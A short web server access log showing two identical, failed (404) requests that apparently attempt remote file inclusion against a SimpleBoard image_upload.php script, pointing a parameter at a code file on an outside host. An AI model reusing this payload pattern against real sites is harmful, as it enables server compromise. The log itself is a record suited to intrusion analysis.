110.45.144.106 - - [12/May/2009:02:50:35 -0400] "GET /logs/access_log.Q109012500%20%20//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:02:50:44 -0400] "GET /logs/access_log.Q109012500%20%20//components/com_simpleboard/image_upload.php?sbp=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
